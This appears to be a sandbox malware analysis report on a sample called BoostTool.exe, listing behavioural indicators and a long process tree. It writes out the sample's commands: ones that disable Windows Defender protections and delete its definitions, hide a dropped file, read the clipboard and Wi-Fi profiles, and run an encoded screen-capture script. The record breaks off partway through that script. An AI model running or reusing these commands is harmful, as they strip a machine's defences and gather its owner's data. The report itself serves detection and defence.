3264	powershell.exe
5740	powershell.exe
5912	powershell.exe
5912	powershell.exe
5740	powershell.exe
1116	WMIC.exe
1116	WMIC.exe
1116	WMIC.exe
1116	WMIC.exe
700	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe
Token: SeShutdownPrivilege	4816	WMIC.exe
Token: SeDebugPrivilege	4816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4816	WMIC.exe
Token: SeRemoteShutdownPrivilege	4816	WMIC.exe
Token: SeUndockPrivilege	4816	WMIC.exe
Token: SeManageVolumePrivilege	4816	WMIC.exe
Token: 33	4816	WMIC.exe
Token: 34	4816	WMIC.exe
Token: 35	4816	WMIC.exe
Token: 36	4816	WMIC.exe
Token: SeDebugPrivilege	4100	tasklist.exe
Token: SeDebugPrivilege	4696	tasklist.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	3912	tasklist.exe
Token: SeDebugPrivilege	4332	powershell.exe
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeDebugPrivilege	5144	powershell.exe
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe
Token: SeShutdownPrivilege	4816	WMIC.exe
Token: SeDebugPrivilege	4816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4816	WMIC.exe
Token: SeRemoteShutdownPrivilege	4816	WMIC.exe
Token: SeUndockPrivilege	4816	WMIC.exe
Token: SeManageVolumePrivilege	4816	WMIC.exe
Token: 33	4816	WMIC.exe
Token: 34	4816	WMIC.exe
Token: 35	4816	WMIC.exe
Token: 36	4816	WMIC.exe
Token: SeDebugPrivilege	3476	powershell.exe
Token: SeDebugPrivilege	6020	powershell.exe
Token: SeIncreaseQuotaPrivilege	3476	powershell.exe
Token: SeSecurityPrivilege	3476	powershell.exe
Token: SeTakeOwnershipPrivilege	3476	powershell.exe
Token: SeLoadDriverPrivilege	3476	powershell.exe
Token: SeSystemProfilePrivilege	3476	powershell.exe
Token: SeSystemtimePrivilege	3476	powershell.exe
Token: SeProfSingleProcessPrivilege	3476	powershell.exe
Token: SeIncBasePriorityPrivilege	3476	powershell.exe
Token: SeCreatePagefilePrivilege	3476	powershell.exe
Token: SeBackupPrivilege	3476	powershell.exe
Token: SeRestorePrivilege	3476	powershell.exe
Token: SeShutdownPrivilege	3476	powershell.exe
Token: SeDebugPrivilege	3476	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1076	EXCEL.EXE
1076	EXCEL.EXE
1076	EXCEL.EXE
1076	EXCEL.EXE
1076	EXCEL.EXE
1076	EXCEL.EXE
1076	EXCEL.EXE
1076	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 1996	2816	BoostTool.exe	82
PID 2816 wrote to memory of 1996	2816	BoostTool.exe	82
PID 2816 wrote to memory of 656	2816	BoostTool.exe	84
PID 2816 wrote to memory of 656	2816	BoostTool.exe	84
PID 2816 wrote to memory of 656	2816	BoostTool.exe	84
PID 1996 wrote to memory of 476	1996	BoostTool.exe	87
PID 1996 wrote to memory of 476	1996	BoostTool.exe	87
PID 1996 wrote to memory of 4172	1996	BoostTool.exe	89
PID 1996 wrote to memory of 4172	1996	BoostTool.exe	89
PID 1996 wrote to memory of 4172	1996	BoostTool.exe	89
PID 656 wrote to memory of 3356	656	RuntimeBroker.exe	90
PID 656 wrote to memory of 3356	656	RuntimeBroker.exe	90
PID 656 wrote to memory of 1916	656	RuntimeBroker.exe	91
PID 656 wrote to memory of 1916	656	RuntimeBroker.exe	91
PID 656 wrote to memory of 1916	656	RuntimeBroker.exe	91
PID 4172 wrote to memory of 4784	4172	RuntimeBroker.exe	92
PID 4172 wrote to memory of 4784	4172	RuntimeBroker.exe	92
PID 476 wrote to memory of 988	476	BoostTool.exe	95
PID 476 wrote to memory of 988	476	BoostTool.exe	95
PID 476 wrote to memory of 3716	476	BoostTool.exe	96
PID 476 wrote to memory of 3716	476	BoostTool.exe	96
PID 476 wrote to memory of 3716	476	BoostTool.exe	96
PID 3356 wrote to memory of 1092	3356	._cache_RuntimeBroker.exe	97
PID 3356 wrote to memory of 1092	3356	._cache_RuntimeBroker.exe	97
PID 3356 wrote to memory of 1092	3356	._cache_RuntimeBroker.exe	97
PID 3716 wrote to memory of 3260	3716	RuntimeBroker.exe	98
PID 3716 wrote to memory of 3260	3716	RuntimeBroker.exe	98
PID 4784 wrote to memory of 2064	4784	._cache_RuntimeBroker.exe	99
PID 4784 wrote to memory of 2064	4784	._cache_RuntimeBroker.exe	99
PID 4784 wrote to memory of 2064	4784	._cache_RuntimeBroker.exe	99
PID 988 wrote to memory of 2468	988	BoostTool.exe	100
PID 988 wrote to memory of 2468	988	BoostTool.exe	100
PID 988 wrote to memory of 2824	988	BoostTool.exe	101
PID 988 wrote to memory of 2824	988	BoostTool.exe	101
PID 988 wrote to memory of 2824	988	BoostTool.exe	101
PID 1092 wrote to memory of 1368	1092	RuntimeBroker.exe	213
PID 1092 wrote to memory of 1368	1092	RuntimeBroker.exe	213
PID 2824 wrote to memory of 1804	2824	RuntimeBroker.exe	107
PID 2824 wrote to memory of 1804	2824	RuntimeBroker.exe	107
PID 2064 wrote to memory of 400	2064	RuntimeBroker.exe	108
PID 2064 wrote to memory of 400	2064	RuntimeBroker.exe	108
PID 3260 wrote to memory of 852	3260	._cache_RuntimeBroker.exe	109
PID 3260 wrote to memory of 852	3260	._cache_RuntimeBroker.exe	109
PID 3260 wrote to memory of 852	3260	._cache_RuntimeBroker.exe	109
PID 2468 wrote to memory of 3304	2468	BoostTool.exe	110
PID 2468 wrote to memory of 3304	2468	BoostTool.exe	110
PID 2468 wrote to memory of 4552	2468	BoostTool.exe	174
PID 2468 wrote to memory of 4552	2468	BoostTool.exe	174
PID 2468 wrote to memory of 4552	2468	BoostTool.exe	174
PID 852 wrote to memory of 3012	852	RuntimeBroker.exe	112
PID 852 wrote to memory of 3012	852	RuntimeBroker.exe	112
PID 1368 wrote to memory of 1520	1368	._cache_RuntimeBroker.exe	231
PID 1368 wrote to memory of 1520	1368	._cache_RuntimeBroker.exe	231
PID 1368 wrote to memory of 1520	1368	._cache_RuntimeBroker.exe	231
PID 4552 wrote to memory of 4940	4552	RuntimeBroker.exe	114
PID 4552 wrote to memory of 4940	4552	RuntimeBroker.exe	114
PID 1520 wrote to memory of 3624	1520	RuntimeBroker.exe	158
PID 1520 wrote to memory of 3624	1520	RuntimeBroker.exe	158
PID 3304 wrote to memory of 548	3304	BoostTool.exe	117
PID 3304 wrote to memory of 548	3304	BoostTool.exe	117
PID 3012 wrote to memory of 2736	3012	._cache_RuntimeBroker.exe	118
PID 3012 wrote to memory of 2736	3012	._cache_RuntimeBroker.exe	118
PID 3012 wrote to memory of 2736	3012	._cache_RuntimeBroker.exe	118
PID 3304 wrote to memory of 1352	3304	BoostTool.exe	177

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4552	attrib.exe
5892	attrib.exe
4744	attrib.exe
5668	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
"C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
  "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
    "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:476
  - - C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
      "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:988
    - - C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2468
      - C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3304
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        7⤵
        Checks computer location settings
        
        PID:548
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        8⤵
        Checks computer location settings
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        9⤵
        Checks computer location settings
        
        PID:4604
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        10⤵
        Checks computer location settings
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        11⤵
        Checks computer location settings
        
        PID:1352
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        12⤵
        Checks computer location settings
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        13⤵
        Checks computer location settings
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        14⤵
        Checks computer location settings
        
        PID:5828
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        15⤵
        Checks computer location settings
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        16⤵
        Checks computer location settings
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        17⤵
        Checks computer location settings
        
        PID:5592
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        18⤵
        Checks computer location settings
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        19⤵
        Checks computer location settings
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        20⤵
        Checks computer location settings
        
        PID:5248
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        21⤵
        Checks computer location settings
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        22⤵
        Checks computer location settings
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        23⤵
        Checks computer location settings
        
        PID:5888
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        24⤵
        Checks computer location settings
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        25⤵
        Checks computer location settings
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        26⤵
        Checks computer location settings
        
        PID:656
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        27⤵
        Checks computer location settings
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        28⤵
        Checks computer location settings
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        29⤵
        Checks computer location settings
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        30⤵
        Checks computer location settings
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        31⤵
        Checks computer location settings
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        32⤵
        Checks computer location settings
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\BoostTool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BoostTool.exe"
        33⤵
        
        PID:5464
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        33⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        34⤵
        
        PID:5216
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        32⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        33⤵
        
        PID:700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"
        34⤵
        
        PID:6036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:5784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        34⤵
        
        PID:1016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2684
        
        C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        35⤵
        Deletes Windows Defender Definitions
        
        PID:5888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
        34⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:4156
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:5856
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        35⤵
        Views/modifies file attributes
        
        PID:5668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
        34⤵
        
        PID:4744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        34⤵
        
        PID:1168
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        35⤵
        Enumerates processes with tasklist
        
        PID:5420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        34⤵
        
        PID:5672
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:3024
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        35⤵
        Enumerates processes with tasklist
        
        PID:1728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        34⤵
        
        PID:5728
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        35⤵
        
        PID:6040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        34⤵
        Clipboard Data
        
        PID:6120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:3160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        35⤵
        Clipboard Data
        
        PID:5024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        34⤵
        
        PID:3632
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        35⤵
        Enumerates processes with tasklist
        
        PID:5884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        34⤵
        
        PID:4072
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        35⤵
        
        PID:1064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        34⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:2540
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        35⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        34⤵
        
        PID:5260
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        35⤵
        Gathers system information
        
        PID:1596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        34⤵
        
        PID:4292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgAC